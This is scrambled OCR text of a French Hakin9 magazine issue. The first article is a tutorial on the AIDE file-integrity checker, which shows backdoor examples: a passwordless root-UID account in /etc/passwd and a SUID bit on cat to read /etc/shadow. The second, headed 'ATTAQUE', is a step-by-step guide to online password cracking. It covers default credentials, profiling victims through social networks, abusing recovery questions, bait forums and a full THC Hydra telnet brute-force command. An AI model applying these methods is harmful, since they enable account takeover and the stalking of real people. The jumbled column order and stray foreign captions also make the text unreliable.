Advanced intrusion Detection Environment ou plus communment appel AiDE est ce que lon appel couramment un HiDs ou encore Host-based intrusion Detection system. Par dfinition, on appelle iDs (Intrusion Detection System) un mcanisme coutant le trafic rseau de manire furtive afin de reprer des activits anormales ou suspectes et permettant ainsi d'avoir une action de prvention sur les risques d'intrusion. Un HiDs assure la scurit au niveau des htes.

Degr de difficult:

Cet artiCle explique...

Lutilisation et linstallation dAiDE.

Ce quil faut savoir...

systeme Unix/Linux (Les bases). 46 HAKIN9 6/2009

IDE peut tre assimil une clone amlior du logiciel de scellement de fichiers bien connu qu'est Tripwire. Le principe dAIDE est relativement simple. Il sagit de construire une sorte de base de donnes de signatures de lensemble des fichiers se trouvant sur la machine, que celle-ci soit une machine cliente ou bien un serveur. AIDE va crer une base de signatures grce des algorithmes d'empreinte cryptographique des fichiers. Priodiquement, AIDE va recalculer les empreintes des fichiers qui peuvent rgulirement changer afin davoir une base de donnes de signatures constamment jour. Au niveau des vrifications, de manire priodique galement (priode dfinie par ladministrateur du systme ou du parc informatique), lensemble des fichiers prsents sur le systme vont tre compars aux signatures prsentes dans la base de donnes. Si les empreintes sont diffrentes (au niveau du fichier, de sa date, de ses droits d'accs, de son inode ...), le logiciel dtectera une modification de fichiers et en avisera ladministrateur par mail ou par fichier de log suivant les paramtres davertissements mis en place.

Ces logiciels sont trs utiles en cas d'intrusion, afin de dcouvrir ce qui a t chang (journaux modifis, fichiers ajouts certains endroits, binaires comme netstat, lsof, who, sshd modifis, fichiers de configuration, pages web, etc.). Paralllement, AIDE peut s'avrer trs utile pour l'administration. En effet, il sera capable de dtecter des erreurs commises (fichiers de configuration changs, ajouts ou effacs, modifications de binaires). Attention, il est cependant trs important de comprendre quAIDE nest pas un outil permettant de protger votre systme dexploitation. Il a pour simple but de vrifier les possibles modifications quil aurait pu y avoir sur le systme et de faire remonter les informations. Si personne ne lit les informations retournes par AIDE, alors les modifications tomberont dans loublie.

installation et configuration daiDe

Au cours de cet article, la distribution utilise fut une Debian 5.0 (Lenny) entirement mise jour. Attention, il est possible que certaines commandes ne soient pas tout fait identiques sur une autre distribution. Les installations se ralisant via le gestionnaire de paquet se

AIDE
raliseront grce au gestionnaire de paquets propre un systme Debian : APT (Advanced Package Tool). la stabilit de votre systme dexploitation. Nous allons raliser linstallation dAIDE de deux manires diffrentes : La premire est tout simplement une installation via les dpts Debian. Lautre, quand elle va se raliser grce aux sources officielles.
Nous pouvons prsent installer AIDE dans de bonnes conditions. nocrash:~# mkdir /var/aide nocrash:~# cd /var/aide/ nocrash:~# wget http:// files/aide/0.13.1/

Mise jour du systme

Il est possible tout moment quune faille de scurit soit dcouverte dans lun des modules composant votre systme que ce soit Apache ou quoi que ce soit dautre. Certaines de ces failles peuvent tre critiques dun point de vue scurit pour lentreprise. Afin de combler ce risque potentiel, il est ncessaire de rgulirement mettre jour lensemble du systme grce divers patches de scurit. Il est possible de mettre jour lensemble du systme via la commande suivante :
nocrash:~# apt-get update && apt-get upgrade

sourceforge.net/projects/aide/ aide-0.13.1.tar.gz/download nocrash:~# tar xzf aide-0.13.1.tar.gz

installation daiDe via les dpts

Linstallation via les dpts est extrmement simple, il suffit de taper la commande suivante afin dinstaller AIDE ainsi que tous les paquets associs:
nocrash:~# apt-get install aide

nocrash:~# cd xzf aide-0.13.1/ nocrash:~# ./configure nocrash:~# make && make install

installation daiDe via les sources

Et voila, linstallation dAIDE via les sources est termine. Il est prsent possible de passer son utilisation.

Le systme dexploitation est maintenant compltement jour, il est donc possible de mettre en place AIDE dans de bonnes conditions. Il est possible de ne pas passer par cette tape mais elle est fortement conseille pour la scurit ainsi que

Linstallation via les sources est lgrement plus complexe mais vraiment trs lgrement. Avant toute chose, il est ncessaire dinstaller certains paquets important pour linstallation dAIDE.
nocrash:~# apt-get install -y build-essential flex libmhash-dev zlib1g-dev bison libgpg-error-dev

initialisation daiDe

Maintenant quAIDE est correctement install, nous allons nous pencher sur son utilisation mais dans un premier temps, nous allons voir de quoi il retourne. Pour des raisons pratiques, je ne mettrais pas ma base de donnes sur un CD/DVD mais rappelez vous que dans votre cas, cela est compltement indispensable.

PUBLICIT

6/2009 HAKIN9

47

BACKUP
Pour voir les possibilits quoffre AIDE, vous pouvez tapez la commande suivante :
nocrash:~# aide --help Commands:

Pour la suite, il est ncessaire de renommer la base de donnes de la manire suivante :

nocrash:~# mv /var/lib/aide/ aide.db.new /var/lib/aide/aide.db

[root@localhost ~]# exit

chmod a+s /bin/cat

nocrash :~$ cat /etc/shadow

root:xxxxx:13449:0:99999:7:::

Usage: aide [options] command -i, --init Initialize

-C, --check Check the database -u, --update the database Compare

the database

Cas pratique

Check and update non-interactively two databases

--compare Miscellaneous:

Au cours de ce chapitre, nous allons apporter des modifications quun pirate pourrait apporter votre systme dexploitation pour pouvoir ensuite voir comment AIDE ragit ce changement de fichier.

Encore une fois, pour reprer ce genre de manipulation, cela reste difficile, car il faudra rgulirement regarder les bons droits sur les fichiers (avec la commande find / -perm +4000 par exemple).

Vrification
Il est prsent possible de vrifier lintgrit du systme grce la commande check. Tout comme la cration de la base de donnes, la vrification prend un peu de temps se faire.
nocrash:~ # aide --check

--config-check Test the

Exemple 1 :
Notre pirate a russi, par une mthode ou une autre, accder en criture, au fichier /etc/passwd. Afin de pouvoir passer en root sur la machine, il y a ajout la ligne suivante :
system::0:0:system:/:/bin/bash

-v, --version Show version of AIDE and

configuration file

-h, --help Show this help message

compilation options

Toujours dans lventualit ou le fichier de configuration nest pas trouv quand vous lancez cette commande, il est possible de prciser son emplacement grce la commande suivante :
nocrash:~ # aide --check [] /etc/aide/aide.conf -c

Cration de la base de donnes :

nocrash:~# aideinit

Suivant le type dinstallation que vous avez choisi, il est possible que le fichier de configuration ne soit pas au mme endroit. Il est donc ncessaire de le prciser de la manire suivante :
nocrash:~# aide --init -c /etc/aide/aide.conf ### AIDE database at initialized

On notera ici, qu'il a simplement cr un utilisateur nomm system, sans mot de passe, qui a le mme ID que root. L'intrus pourra ainsi, a tout moment passer root sur la machine, via un simple compte utilisateur, en utilisant la commande su system Ce type de backdoor est assez difficile reprer, tant donn que l'on ne consulte pas le fichier /etc/passwd tous les jours et qu'en plus, le nom system pourrait paratre normal.

changed: /etc/passwd changed: /bin/cat []

/var/lib/aide/aide.db.new

Exemple 2 :
L encore, notre intrus obtenu les droits root et il voudrait tre sr de pouvoir revenir sous cette identit, sa guise et mme aprs un changement du mot de passe de ce dernier par l'administrateur. Pour se faire, il pourra positionner un bit SUID, sur les commandes qu'il dsire, afin de pouvoir les excuter ensuite en tant que root :
nocrash:~$ cat /etc/shadow cat: /etc/shadow: nocrash:~$ su Password: Permission non accorde

La base de donnes est donc cre lemplacement /var/lib/aide/aide.db.new initialized. La premire mthode (aideinit) est fortement conseille, certains bugs apparaissent avec la deuxime. Ce processus prend environ une quinzaine de minutes, alors soyez patient. Si vous ne savez pas ou est votre fichier de configuration vous pouvez utiliser la commande find de la manire suivante :
find / -name aide.conf
48 HAKIN9 6/2009

Nous pouvons donc voir quAIDE bien dtect les changements qui ont eu lieu entre le moment ou la base de donnes t construite et le moment ou on ralise la vrification. Bien sur, il est possible dautomatiser ces actions grce cron et mme de se faire notifier par mail. Pour les mails, il est ncessaire de dmarrer le dmon sendmail et de linstaller sil nest pas prsent sur la machine :
nocrash:~ # apt-get install nocrash:~ # /etc/init.d/ sendmail start sendmail

Rgis SENET

[root@localhost ~]#

est actuellement tudiant en quatrieme anne a lcole Suprieur dinformatique Supinfo. Passionn par les tests dintrusion et les vulnrabilits Web, il tente de dcouvrir la scurit informatique dun point de vue entreprise. Il est actuellement en train de sorienter vers le cursus CEH, LPT et Offensive Security. Contact : regis.senet@supinfo.com Site : http://www.regis-senet.fr

AIDE

6/2009 HAKIN9

49

Prosz powiedzie,

Degr de difficult

ATTAQUE Hacker les mots de passe

Figura 1. Seleccin de modo de arranque

I
Cet artiCle explique...
Les attaques permettant de hacker des mots de passe pour les services distance, Les outils qui servent cracker les mots de passe online, Les mthodes de profiling des propritaires des comptes protgs par un mot de passe, Les mthodes pour trouver des informations personnelles sur des inconnus, Les principes de crer des mots de passe scuriss.

Ce qu'il faut savoir...

Connatre les notions de l'ingnierie sociale, Connatre les notions des mthodes pour faire des attaques simples sur le rseau, Connatre les notions du fonctionnement et de l'utilisation des outils qui servent analyser le rseau et les systmes informatiques, tels que Nmap, Connatre les notions du fonctionnement du protocole Telnet. 50 HAKIN9 6/2009

l existe de nombreuses mthodes diffrentes pour cracker des mots de passe. Afin de choisir une mthode approprie, il faut reposer sur une analyse de la tche concrte. Nous distinguons deux types d'attaque de base relatifs aux mots de passe. Les attaques du type offline se servent du fait d'avoir un accs direct au fichier chiffr (par exemple, les archives RAR, ZIP, etc. chiffrs) ou au fichier contenant les mots de passe chiffrs (par exemple, le fichier /etc/shadow dans les systmes d'exploitation du type *NIX). Bien que rcuprer les mots de passe directement sous forme chiffre, donc retourner un algorithme qui gnre les mots de passe cods, peut tre difficile, voire impossible. Possder les mots de passe sous cette forme ouvre la voie plusieurs mthodes de l'attaque. Rcuprer un mot de passe cod permet de dfinir un groupe de mots de passe probables, de gnrer leurs codes conformment l'algorithme utilis dans ce cas-l et ensuite de comparer tous les mots de passe cods au mot de passe crack. Si le mot de passe cod est identique un de mots de passe cods dans l'ensemble vrifi, nous avons russi : nous avons trouv le mot de passe recherch. La plupart d'algorithmes utiliss actuellement pour gnrer un mot de passe cod sont trs rapides, grce quoi il est possible en une seconde de gnrer des centaines de milliers de mots de passe cods

et de les comparer un modle. Toute une gamme d'attaques a t base sur ce principe : notamment les attaques par dictionnaire, les attaques qui vrifient toutes les combinaisons de mots de passe possibles (algorithmes de force) et les mthodes hybrides. Les attaques bases sur les tableaux arc-en-ciel constituent une russite rcente dans le domaine de crackage de mots de passe offline. L'ide est assez simple : cette mthode repose sur la gnration d'une base contenant les couples
<mots de passe, mot de passe cod>

pour l'ensemble de mots de passe prvu. Les mthodes spciales permettent d'enregistrer seulement certains mots de passe cods. Grce cette dmarche, la base entire garde une taille raisonnable. Dans un tel cas, deviner un mot de passe dont le code est en notre possession, consiste trouver dans la base le code identique et lire le mot de passe qui lui correspond. Ces mthodes sont trs efficaces et trs rapides. Il est possible en quelques secondes de cracker un mot de passe. Les mthodes traditionnelles de vrification de toutes les combinaisons possibles auraient besoin des jours, des mois, voire des annes pour le faire. Les attaques du type offline ont t prsentes en dtails dans notre magazine Hakin9 (numro 1/2009) par ukasz Ciesielski. Je voudrais parler en revanche dans cet article des attaques du type online. Les attaques de

ce type peuvent tre dfinies comme celles o la seule possibilit de vrifier si le mot de passe est correct consiste tenter de se connecter au systme attaqu. Les exemples de ces attaques : tentative d'attaquer un serveur FTP distant ou tentative d'obtenir le mot de passe une bote e-mail disponible via l'interface Web. Dans ce type d'attaques, le processus de cracker le mot de passe est trs complexe. Il en est ainsi car les situations o nous utilisons des mthodes du type online se caractrisent pas l'absence d'accs au mot de passe attaqu sous forme cod. Il est donc impossible d'opter pour les attaques par dictionnaire, de force, hybrides et pour celles qui reposent sur la base de mots de passe cods gnres auparavant. Comment donc cracker un mot de passe lorsque nous ne disposons d'aucune donne sur son sujet et nous ne pouvons pas accder au systme o ce mot de passe est stock ? Il existe des mthodes, aussi bien techniques que non, dont l'utilisation simultane permettra de cracker des mots de passe et leur efficacit peut tre surprenante.

Magie noire ?

Comme je l'ai dj mentionn, les attaques du type online se caractrisent par l'absence d'accs au mot de passe chiffr. Cette situation rend impossible l'utilisation de la plupart de mthodes traditionnelles pour cracker des mots de passe car elles se basent sur la gnration et la comparaison des mots de passe cods. Ce n'est pas toutefois le seul problme qui se trouve devant un intrus. Comme le contact avec le systme d'exploitation ou le service attaqu n'est possible que par l'intermdiaire d'un rseau (sous forme d'une tentative de connexion), vrifier une seule combinaison de mot de passe dure beaucoup plus longtemps qu'une opration similaire effectue en local. Cela signifie donc que dans le cas d'attaques online, l'intrus est en gnral incapable de tester des millions ou des milliers de combinaisons de mots de passe. De plus, les milliers de tentatives de connexion envoyes au

serveur par un rseau public peuvent attirer l'attention des systmes rseau chargs de dtecter des attaques NIDS (en anglais Network Intrusion Detection System) qui remarqueront la tentative d'attaque. Il arrive aussi souvent que les administrateurs dfinissent un nombre maximal de tentatives de connexion un serveur ou service donn dans un intervalle dfini, ce qui rend galement impossible les tentatives massives de connexion distance. Les attaques du type online constituent pour un intrus un grand dfi mais elles ne sont pas impossibles raliser. Un cracker peut dans un tel cas opter pour une mthode que nous pouvons appeler une mthode par dictionnaire modifie avec l'utilisation des outils d'automatisation de la connexion distance. L'ide est assez simple et consiste gnrer un petit dictionnaire contenant seulement les mots de passe dont nous pensons qu'ils peuvent tre utiliss dans le cas concret. Munis d'un dictionnaire ainsi prpar, nous utilisons ensuite les outils qui tenteront une connexion automatique au serveur ou service attaqu pour tous les mots tests. Au moment o l'une de tentatives russit, le programme affichera le mot de passe correct pour le systme attaqu. Comme vous pouvez le constater, la partie la plus difficile de cette opration consiste gnrer ce dictionnaire magique de mots de passe potentiels. Au premier abord, la tche semble pratiquement impossible faire car

sur quoi nous baser pour deviner un mot de passe ? Je vous dmontrerai dans un instant que cette tche peut s'avrer tonnamment simple. Les connaissances strictement informatiques ne seront pas ici utiles. Il faut utiliser les statistiques, la psychologie appliques et l'ingnierie sociale. Le plus grand alli de l'intrus est tout simplement la paresse et la ngligence humaines...

Cracker la bote noire

Lorsque nous n'avons aucune connaissance sur le serveur, le service ou le dispositif rseau (je parle ici galement de connaissances sur les administrateurs) dont le mot de passe nous voulons avoir, nous parlons du crackage de la bote noire (en anglais black box cracking). Il semble que crer un dictionnaire de mots de passe potentiels qui servirait aux tests suivants soit impossible dans une telle situation. Remarquez toutefois que les serveurs d'aujourd'hui travaillent sous contrle d'un des plusieurs systmes d'exploitation couramment utiliss. Les applications Web utilisent gnralement plusieurs moteurs les plus populaires. Les services sont proposs au moyen de plusieurs solutions populaires, commerciales ou gratuites. Enfin, les dispositifs rseau spcialiss, tels que les commutateurs ou les routeurs, proviennent en grande partie de plusieurs fabricants leaders. La conclusion : l'intrus rencontrera le plus probablement un environnement typique, il arrive rarement qu'une solution donne

6/2009 HAKIN9

51

ATTAQUE
soit cre depuis les bases la commande. Ensuite, nous pouvons remarquer que probablement toutes ces solutions (application Web, routeur, serveur de base de donnes, etc.) proposeront une interface permettant une gestion distance. Il peut s'agir d'une interface disponible via le navigateur Internet, via une ligne de commandes, le protocole SNMP, etc. Ceci n'a pas d'importance. La chose la plus importante est que l'intrus est capable d'identifier une telle cible. Au moyen des techniques connues comme OS and Service Fingerprinting, nous sommes capables de recueillir une srie d'informations sur la cible de l'attaque. La description dtaille des techniques d'empreinte digitale dpasse les cadres de cet article, je mentionnerai donc seulement que le scanneur rseau Nmap peut tre trs utile ici. Lorsque nous disposons des informations lmentaires sur le type du systme d'exploitation, du dispositif ou du service, nous pouvons passer la cration de la liste de mots de passe potentiels. Dans le cas de la bote noire, la liste de mots de passe potentiels doit contenir dans un premier temps les mots de passe par dfaut rencontrs dans la solution en question. Il arrive trs souvent que les dispositifs ou les services ne soient pas correctement protgs. Les administrateurs laissent les comptes par dfaut avec des mots de passe par dfaut et les utilisent. Il peut galement arriver que les administrateurs aient cr des comptes protgs par des mots de passe puissants et ils les utilisent pendant le travail mais ils ont oubli de dsactiver les comptes intgrs par dfaut. Il arrive aussi qu'un compte test (par exemple, test) ait t cr pour mettre en place et tester un nouveau service protg par un mot de passe facile retenir (par exemple, test aussi). Nous pouvons rencontrer des situations dans lesquelles un mot de passe vide est utilis pendant les tests ! Ce choix doit bien videmment faciliter les connexions frquentes durant les tests du service. Il arrive malheureusement souvent qu'une fois le lancement final effectu, les administrateurs oublient de supprimer un tel compte. Contrairement de nombreux administrateurs, les hackers et les crackers connaissent trs bien le problme de mots de passe par dfaut ou utiliss dans les tests et ils profitent souvent de cette faille. Les groupes de hackers et de crackers crent mme des listes spciales de mots de passe o tout le monde peut trouver des mots de passe par dfaut pour un appareil ou un programme donn. Le groupe connu sous le nom de Phenoelit a cr et actualise sans cesse une des plus grandes listes de ce type. En utilisant cette liste, les administrateurs peuvent vrifier si les mots de passe par dfaut aux services et dispositifs dans leurs rseaux ne sont pas actifs. Malheureusement, les crackers peuvent aussi (et ils le font) utiliser cette base de mots de passe... Dans un second temps, il faut prendre en considration les mots de passe susmentionns employs lors des testes et les mots de passe utiliss le plus souvent. Si les mots de passe par dfaut n'ont pas permis de se connecter un service distant, le cracker peut encore vrifier les mots de passe utiliss le plus souvent. Les statistiques relatives aux mots de passe utiliss, dmontrent clairement que les gens choisissent en gnral des mots de passe simples, faciles retenir et qui se rfrent quelque chose qu'ils connaissent. Les listes de mots de passe le plus souvent utiliss sont bien videmment aussi publies sur Internet. l'instar des mots de passe par dfaut, ils peuvent tre utiliss pour vrifier si le mot de passe que nous utilisons se trouve sur l'une de ces listes. Ces listes sont toutefois utilises le plus probablement par des intrus pour crer des listes de mots de passe potentiels. Les mots de passe considrs le plus souvent comme le plus utiliss sont les suivants : mot de passe vide (absence de mot de passe), mot mot de passe ou password , mot admin ou administrateur , suite de caractres avoisinants sur le clavier par exemple azerty ou qsdf , mot de passe identique au nom du compte (login), injure. La plupart d'administrateurs se rendent compte du fait qu'il ne faut pas utiliser
52 HAKIN9 6/2009

les mots de passe employs le plus souvent et donc ils en choisissent un... et ils le modifient. Ils ajoutent le plus souvent un chiffre la fin ou au dbut du mot de passe. Il s'agit le plus frquemment d'un chiffre 1. Les crackers le savent bien videmment et ils ajouteront la liste de mots de passe probables les combinaisons comme : admin1, password1, ou bien 1asdf. Analysons un exemple de voler un mot de passe : une tentative de hacker un mot de passe pour un systme travaillant sur une adresse IP concrte. Mis part l'adresse IP, nous ne savons rien sur la cible de l'attaque, il s'agit donc du cas de crackage de la bote noire. Munis uniquement de l'adresse IP, nous pouvons dans un premier temps essayer d'identifier le type du systme qui fonctionne l'adresse distante. Pour ce faire, il suffit de lancer le scanneur Nmap avec les paramtres suivants : nmap -A adresse_ IP_de_la_cible. Regardez le rsultat du scan (Figure 1). Vous remarquerez que Nmap a identifi le systme distant comme un routeur travaillant sous le contrle du systme d'exploitation IOS. Vous verrez aussi que l'adresse scanne supporte la liaison du type DSL dans le domaine tpnet.pl. Sous l'adresse IP choisie se cache donc le routeur de l'entreprise Cisco derrire lequel se trouve le plus probablement le rseau LAN de l'entreprise. Analysons la suite des rsultats du scan : nous remarquerons les ports ouverts de l'appareil, en particulier 23/TCP et 80/TCP. Les services telnet et les gestions ouverts tous par le serveur Web intgr sont la preuve que l'appareil n'a pas t correctement protg. Nous pouvons donc essayer de nous connecter l'appareil via les interfaces ouvertes en utilisant les mots de passe par dfaut (les donnes par dfaut permettant de nous connecter au routeur Cisco, c'est en gnral : cisco:cisco) ou les mots de passe le plus frquemment employs. Si nous sommes chanceux, nous russirons obtenir un accs complet l'appareil.

Cracker la bote grise

Si nous n'avons aucune donne sur le systme attaqu, les mthodes prsentes ne sont pas bien videmment

Figure 3. Activation du crash dump

6/2009 HAKIN9 53

ATTAQUE
efficaces 100 % et le succs dpendra d'une faiblesse ventuelle du mot de passe ou de la ngligence de l'administrateur. Cependant, l'intrus dispose trs souvent d'un savoir partiel sur le service attaqu ou son administrateur/ propritaire. Il en est ainsi car en gnral, il choisit une cible concrte de l'attaque et le choix n'est pas alatoire. Lorsque nous disposons d'un savoir, aussi minime soit il, sur le systme attaqu et les personnes y lies, nous parlons d'une attaque consistant cracker une bote grise (en anglais gray box cracking). En crant un dictionnaire de mots de passe potentiels au systme dont nous connaissons quelque chose, nous testerons dans un premier temps les possibilits prsentes dan le cas d'une bote noire. Si les mots de passe par dfaut et le plus souvent employs ne permettent pas de nous connecter au service attaqu, il faut alors nous servir du savoir relatif au systme lui-mme et aux personnes qui le grent. Si le savoir concerne le systme, le service, le serveur, le logiciel ou l'appareil dont le mot de passe nous voulons voler, nous pouvons utiliser ce savoir de manire suivante en crant le dictionnaire de mots de passe potentiels : sachant que l'application cre la commande s'appelle par exemple GigaWebAdmin, nous pouvons ajouter au dictionnaire de mots de passe probables les logins et les mots de passe suivants : gigawebadmin:gigawebadmin, admin:gigawebadmin, administrator: gigawebadmin, etc. ; il est galement conseill de tester les mots de passe contenant un chiffre au dbut et la fin, tels que gigawebadmin1 et 1gigawebadmin, si le systme, dont le mot de passe nous voulons voler, propose une interface Web permettant d'enregistrer un nouvel utilisateur, il est conseill de faire sa connaissance : elle pourra tre une source d'informations prcieuses relatives aux exigences et aux limites des mots de passe. Grce cette information, nous pouvons par exemple apprendre que les mots de passe des utilisateurs du systme doivent contenir au moins un chiffre. Nous pourrons donc ensuite modifier le dictionnaire de mots de passe probables de sorte que toutes les entres contiennent un chiffre au dbut ou la fin (c'est la manire la plus probable utilise par les utilisateurs pour remplir les exigences du systme), si nous avons des informations sur l'entreprise qui implmente le systme donn, elles peuvent aussi tre d'une grande aide. Si l'entreprise s'appelle par exemple Giga Web Soft, l'intrus peut ajouter au dictionnaire les logins et les mots de passe suivants : gigawebsoft:gigawebsoft, gigawebsoft:gigawebsoft1, gws:gws, gws:gws1, etc. ; il est fort probable que les dveloppeurs ont cr pour euxmmes un compte d'administrateur protg par un mot de passe simple retenir pour la dure de la mise en place. Les administrateurs peuvent en revanche oublier de dsactiver ou de supprimer un tel compte. compte, nous pouvons ajouter des suites de caractres lis son prnom ou nom ou sa date de naissance la liste de mots de passe probables. Si nous avons des informations sur les personnes proches du propritaire du compte, nous pouvons vrifier les mots de passe lis aux donnes personnelles de l'pouse/l'poux, d'un(e) ami(e), etc. certains utilisateurs savent que les donnes personnelles de leurs proches peuvent tre trop faciles deviner, ils choisissent donc pour leur mot de passe une suite de caractres lis aux faits connus pour un nombre restreint de personnes, par exemple, les prnoms des animaux domestiques, le nom de l'endroit prfr ou le prnom du premier amour de la priode de l'cole lmentaire.

Si nous avons des informations sur la personne dont le mot de passe au service donn nous voulons hacker, la situation est plus intressante. En crant un dictionnaire de mots de passe potentiels, nous pouvons alors essayer de nous servir des faits suivants : si nous connaissons les donnes personnelles du propritaire du

Bien videmment, il est conseill de tester mme ces combinaisons avec un chiffre au dbut et la fin car c'est toujours la manire la plus frquente de diversifier les mots de passe. Il arrive souvent toutefois que l'intrus ne connat pas bien la personne dont le compte il veut visiter. Il est possible d'avoir le prnom et le nom de l'administrateur du systme informatique donn, du serveur ou de l'appareil rseau (nous pouvons parfois trouver ces informations sur le site Web de l'entreprise en question !) mais de n'avoir aucune autre donne personnelle ni aucune information lie la vie prive de cette personne. Il existe toutefois des mthodes permettant de faire connaissance des personnes compltement inconnues...

un (in)connu

Abbildung 6. Ein dezentral organisiertes Netzwerk (TCP/IP).

54 HAKIN9 6/2009

Imaginons que nous avons russi trouver le prnom et le nom du propritaire du compte dont le mot de passe nous cherchons. Comment crer un dictionnaire de mots de passe potentiels, contenant les mots de passe par dfaut et le plus souvent employs ainsi que les suites avec des donnes personnelles de cette personne et de ses amis ? Il suffit de visiter les rseautages sociales (en

anglais social network services), telles que Copains d'avant. Les portails de ce type permettent de rencontrer des contacts intressants, de connatre des nouvelles personnes et de renouveler des connaissances d'avant. Malheureusement, pour que les autres puissent nous retrouver, nous sommes obligs de partager de nombreuses informations notre sujet. Si nous ne connaissons que le prnom et le nom du propritaire du compte attaqu et supposons qu'il fait partie des portails sociaux, nous pouvons recueillir une srie de mots de passe potentiels. Premirement, si la recherche retourne de nombreux utilisateurs avec le mme prnom et nom, il faut dterminer de quel profil il s'agit. Nous pouvons nous focaliser alors sur le lieu de domicile (prs de l'entreprise o la personne travaille) et la description de ce qu'elle fait comme travail. Si nous identifions le compte appropri sur le portail, nous pouvons recueillir de nombreux mots de passe potentiels d'aprs l'analyse du profil et de ses connaissances. titre d'exemple, les mots de passe potentiels ainsi dfinis peuvent tre les suivants : pseudo de l'cole, nom de jeune fille (il arrive que les femmes maries utilisent leur nom de jeune fille en tant que mot de passe pensant que peu de gens le connaissent dans leur nouvel environnement), numro de tlphone, prnom de l'animal domestique prfr (si quelqu'un a un animal domestique, il a peut-tre publi sa photo avec son prnom), nom du lieu prfr (nous parcourons la galerie de photos la recherche des photos avec une description adquate), donnes personnelles du meilleur ami ou d'une copine de l'enfance (nous parcourons la galerie de photos sentimentales avec des commentaires), numro de la plaque d'immatriculation (ou marque/modle) de la voiture, de la moto, etc. (il arrive que les utilisateurs publient dans les galeries les photos des vhicules qu'ils possdent),

donnes personnelles des proches (poux/pouse, frres et soeurs, enfants) et des amis.

Afin de dterminer lesquels de contacts de la personne en question appartiennent ses proches, il suffit en gnral d'analyser la galerie de photos et leurs descriptions et commentaires ajouts au profil et photos par d'autres utilisateurs du portail. Lorsque nous avons dtermin le groupe de personnes proches, nous pouvons ajouter toutes les catgories de donnes susmentionnes (dtermines respectivement pour chaque personne) la liste de mots de passe probables. Comme d'habitude, une bonne ide consiste ajouter des combinaisons contenant un chiffre au dbut et la fin de la suite, il est galement conseill d'ajouter des combinaisons crites l'envers. Tout dpend bien videmment quel degr notre dictionnaire de mots de passe probables doit tre restreint (par exemple, en raison des limites appliques sur le systme donn concernant le nombre de connexions pendant une priode dfinie). Si nous disposons d'autres donnes

relatives au propritaire du compte, il est possible aussi d'utiliser d'autres techniques pour recueillir des informations sur les mots de passe probables. Si par exemple nous connaissons l'adresse e-mail prive du propritaire du compte attaqu, ouvert sur un serveur public, nous pouvons profiter de cette information. Il suffit d'utiliser le formulaire qui sert rcuprer un mot de passe oubli de la bote e-mail. Si la question permettant de rcuprer le mot de passe est assez simple (par exemple, le prnom de mon chien, le prnom de mon premier amour), nous pourrons peut-tre rcuprer le mot de passe de la bote car nous avons le plus probablement trouv les rponses ces questions sur le portail social. Si nous sommes chanceux, le mot de passe du compte attaqu sera identique ou trs similaire au mot de passe rcupr dans la bote de messages lectroniques. Ce n'est pas un secret que de nombreuses personnes utilisent toujours les mmes mots de passe (ou trs similaires). Mme si le mot de passe du compte cible est diffrent, nous pouvons au moins avoir l'ide de mots de passe que la personne

6/2009 HAKIN9

55

ATTAQUE

56 HAKIN9 6/2009

6/2009 HAKIN9

57

ATTAQUE
utilise. Si nous russirons accder (par exemple, distance) l'ordinateur utilis par la personne en question, rcuprer les informations sur les mots de passe employs est encore plus simple. Il suffit que l'intrus cracke le mot de passe du compte de cette personne dans le systme Windows au moyen de la distribution Linux prvue cet effet : Ophcrack. Il est galement possible de dcouvrir les mots de passe employs dans les messageries instantanes. Tous ces points faciliteront bien videmment l'intrus de dfinir de manire prcise les mots de passe potentiels lors de l'attaque du compte cible de l'utilisateur. Afin de connatre les exemples de mots de passe employs par la personne analyse, l'intrus peut se servir des mthodes sociotechniques avances. titre d'exemple, s'il connat les centres d'intrt de la personne attaque (le portail social est de nouveau trs utile), il peut lui envoyer une invitation pour ouvrir un profil dans un forum thmatique spcialement prpar. Cette dmarche permettra d'apprendre quel type de mot de passe la personne utilise. Comme vous pouvez le constater, un intrus ingnieux dispose de toute une gamme de possibilits pour dterminer une liste de mots de passe potentiels employs par la victime. Pour conclure la procdure d'attaque du type online que je propose, j'ai cr un schma selon lequel l'intrus peut procder l'attaque (Figure 3). Les exemples prsents ne constituent que quelques ides, les possibilits dans ce cadre sont quasiment illimites. Aprs un processus fatigant pour crer un tel dictionnaire, il ne nous reste qu' tester son efficacit. cela, vrifier la main toutes les possibilits via la mthode de la tentative manuelle de connexion au service distant n'a aucun sens. Dans les cas extrmes, le processus durerait trop longtemps et il est possible de faire des erreurs en saisissant les mots de passe la main. Par consquent, la tentative serait peu crdible et prendrait beaucoup de temps. cette tape, il faut donc opter pour un outil permettant d'effectuer des tentatives automatiques de connexion des systmes et services diffrents selon la liste de mots de passe donne. Il s'avre qu'un outil parfait pour ce faire a t cr par un groupe allemand de hackers agissant sous le nom de THC (en anglais The Hacker's Choice). THC Hydra est un programme permettant de tester assez rapidement les mots de passe de nombreux services diffrents. Cet outil supporte plusieurs dizaines de protocoles dont les plus importants sont : telnet, ftp, http, https, smb, ms-sql, mysql, rsh, snmp, vnc, pop3, imap, Cisco auth, Cisco enable, Cisco AAA. 23 port TCP, donc il permettait une gestion texte via le protocole telnet. Afin de faire une tentative de hacker le mot de passe au compte par dfaut appel cisco, il suffit de lancer l'Hydre avec les paramtres suivants : hydra adres_IP_celu telnet -s 23 -v -l cisco -P /slownik.txt -e ns -t 36 (Figure 4). Le fichier de mots de passe potentiels utiliss dans ce cas-l contenait les mots de passe par dfaut rencontrs dans le cas des appareils Cisco et plusieurs mots de passe employs le plus souvent. Au bout de quelques secondes, l'Hydre a termin son travail en affichant le mot de passe trouv pour le compte cisco. Dans ce cas, l'administrateur n'a pas supprim le compte par dfaut et n'a pas modifi le mot de passe y li, ce qui a permis de dterminer l'intrus les donnes permettant se connecter au systme. Comme vous pouvez le constater, il n'est pas difficile de grer le programme Hydre. La signification de tous les paramtres d'appel est la suivante : telnet type du service pour lequel nous voulons tester les mots de passe, -s 23 numro du port, -l cisco login pour lequel nous voulons tester les mots de passe, -p /slownik.txt mots de passe ou fichier avec une liste de mots de passe que nous voulons tester, -e ns activation du test des mots de passe vides ou identiques avec le login, -t 36 nombre de connexions simultanes au service attaqu.

Hydre fouinard

Munis du dictionnaire de mots de passe potentiels cr auparavant pour le systme ou le service cracker, il ne nous reste qu' passer l'attaque proprement parler. Dans le cas d'attaques du type online, le dictionnaire prpar peut contenir de plusieurs centaines jusqu' plusieurs milliers d'entres. Crer des dictionnaires plus grands n'a pas en gnral de sens en raison des limites susmentionnes prsentes dans ce type d'attaques. Malgr
58 HAKIN9 6/2009

